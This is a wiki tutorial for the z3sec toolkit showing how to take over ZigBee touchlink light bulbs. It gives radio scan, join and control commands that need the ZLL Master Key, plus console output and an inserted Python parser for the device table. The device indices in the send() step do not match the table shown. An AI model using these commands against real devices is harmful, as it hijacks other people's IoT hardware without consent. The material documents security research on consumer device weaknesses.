Tutorial 2: Takeover Attack

IoTsec edited this page Aug 21, 2017 · 17 revisions

This tutorial describes a way to take over ZigBee-certified light bulbs. The goal is to join the bulb, referred to as the target, to the attacker's network. In a second step, we want to change the color of the light (assuming that the bulb supports colored light).

We assume a USRP is used as the radio transceiver. If you are using a KillerBee radio (e.g., connected to /dev/ttyUSB0), substitute --sdr with --kb /dev/ttyUSB0 in all commands below.

Scan for Targets

First of all, scan for touchlink-enabled devices:

z3sec_touchlink --sdr -c all scan

Then choose a target device.

Join Target to the Attacker's Network

Please note that this attack requires knowledge of the ZLL Master Key. Provide this key in ~/.config/z3sec/touchlink_crypt.ini.

To join the target device to the attacker's network, run the following command:

z3sec_touchlink --sdr -c all join --target EE:EE:28:0D:55:F1:98:1E --channel_new 25 --addr_new 0x1234 --network_key A0A1A2A3A4A5A6A7A8A9AAABACADAEAF

This command scans for the target on all channels and, if the device is found, joins it (from now on addressed as 0x1234) to a network with a random PAN ID on channel 25 and sets the network key to 0xA0A1A2A3A4A5A6A7A8A9AAABACADAEAF. The new configuration (channel, 16-bit device address, 128-bit network key) can be set to any arbitrary value.

Alternatively, the network key of an already existing network can be obtained by sniffing touchlink commissioning traffic with the z3sec_key_extract tool.

Get PAN ID

To get the PAN ID of the attacker's network, scan for devices on the channel of this network:

z3sec_touchlink --sdr -c 25 scan

The output shows the PAN ID of the attacker's network.

Control the Target

In order to control the target, use the following command:

z3sec_control --sdr -c 25 --pan_id 0xABCD --network_key A0A1A2A3A4A5A6A7A8A9AAABACADAEAF

Please note that the parameters need to match the configuration of the attacker's network.

Now, a Scapy interface opens that should look like this:

Z3sec control console (utilizing IPython):
In [1]:

Show Available Devices of the Network

To show a list of all available devices, enter:

In [x]: show()

It might be necessary to wait 1-2 minutes after power-up before devices are discovered and displayed. (Make sure that all addresses, sequence numbers (except zdp_sqn), and frame counters of a device have been discovered before using it for spoofing; fields that are still undiscovered are shown as None.)

The output should look like this:

Network: 0
pan_id:      0xABCD
ext_pan_id:  DE:FE:C8:ED:DE:FE:C8:ED
network_key: a0a1a2a3a4a5a6a7a8a9aaabacadaeaf
# Devices:   2
# |addr   |ext_addr                |mac_sqn |nwk_sqn |sec_fc  |aps_fc |zcl_sqn |zdp_sqn |
=========================================================================================
0 |0xBAAD |DD:FF:88:0D:EE:FF:CC:66 |148     |229     |8323398 |3298   |23      |None    |
1 |0xFA11 |EE:EE:28:0D:55:F1:98:1E |38      |112     |7249729 |2384   |6       |None    |
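The device table above is plain console text, so checking the completeness note from the previous section by eye gets tedious for larger networks. The following parser is an added example (not part of z3sec) that turns show() output into Python records and lists which device entries still have undiscovered fields; the sample input is constructed to match the output shown above, and the function names are the example's own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample, shaped like the show() output of the z3sec control console.
SAMPLE_SHOW_OUTPUT = """\
Network: 0
pan_id:      0xABCD
ext_pan_id:  DE:FE:C8:ED:DE:FE:C8:ED
network_key: a0a1a2a3a4a5a6a7a8a9aaabacadaeaf
# Devices:   2
# |addr   |ext_addr                |mac_sqn |nwk_sqn |sec_fc  |aps_fc |zcl_sqn |zdp_sqn |
=========================================================================================
0 |0xBAAD |DD:FF:88:0D:EE:FF:CC:66 |148     |229     |8323398 |3298   |23      |None    |
1 |0xFA11 |EE:EE:28:0D:55:F1:98:1E |38      |112     |7249729 |2384   |6       |None    |
"""

# Fields the tutorial requires to be discovered; zdp_sqn is explicitly excluded.
REQUIRED_FIELDS = ("addr", "ext_addr", "mac_sqn", "nwk_sqn", "sec_fc", "aps_fc", "zcl_sqn")


def _cell(value: str) -> Optional[object]:
    """Convert one table cell: 'None' -> None, decimal/hex numbers -> int, else str."""
    value = value.strip()
    if value == "None":
        return None
    if re.fullmatch(r"\d+", value):
        return int(value)
    if re.fullmatch(r"0x[0-9A-Fa-f]+", value):
        return int(value, 16)
    return value


def parse_show_output(text: str) -> List[Dict]:
    """Parse console text into a list of networks, each with a 'devices' list."""
    networks: List[Dict] = []
    columns: List[str] = []
    for line in text.splitlines():
        if line.startswith("Network:"):
            networks.append({"id": int(line.split(":", 1)[1]), "devices": []})
        elif line.startswith("# |"):  # column header row
            columns = [c.strip() for c in line.strip("# |").split("|") if c.strip()]
        elif re.match(r"^\d+ \|", line):  # one device row
            cells = line.split("|")
            dev = {"index": int(cells[0])}
            dev.update({col: _cell(val) for col, val in zip(columns, cells[1:])})
            networks[-1]["devices"].append(dev)
        elif line.startswith("# Devices:"):
            networks[-1]["device_count"] = int(line.split(":", 1)[1])
        elif ":" in line and networks:  # pan_id / ext_pan_id / network_key lines
            key, _, val = line.partition(":")
            networks[-1][key.strip()] = val.strip()
    return networks


def incomplete_devices(networks: List[Dict]) -> List[Dict]:
    """Return devices for which at least one required field is still None."""
    return [d for n in networks for d in n["devices"]
            if any(d.get(f) is None for f in REQUIRED_FIELDS)]
```

Run parse_show_output(SAMPLE_SHOW_OUTPUT) on captured console text; an empty result from incomplete_devices() means every listed device has all required fields filled in.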

Create Phantom Device

A phantom device may be needed if there is no other device in the network besides the target. The phantom device is a virtual device that sends the commands to the target.

To create a phantom device in the network with number 0, run the following command:

In [x]: create_phantom_device(0)

A new device should show up in the network when the show() command is executed again.

Turn Target On and Off

The general structure of sending a command looks like this:

send(<network ID>, <source device ID>, <destination device ID>, <command>)

In our case, the network ID is 0, the source device ID is 1 (the phantom device), and the destination device ID is 0 (the target).

Now we want to turn the target on and off, so we use the phantom device to send the commands to the target.

Turn off:

In [x]: send(0,1,0, pkt_off)

Turn on:

In [x]: send(0,1,0, pkt_on)

If the target does not respond, run the command several times.

Change Color of the Target's Light

To change the color of the target, run the following command:

In [x]: send(0,1,0, pkt_red)

The packet pkt_red can also be substituted with pkt_blue, pkt_green, or pkt_white.

Please note that these commands only work for bulbs that support colored light. If the target does not respond, run the command several times.

Other ZigBee packets can be forged inside the control console using the Scapy interface.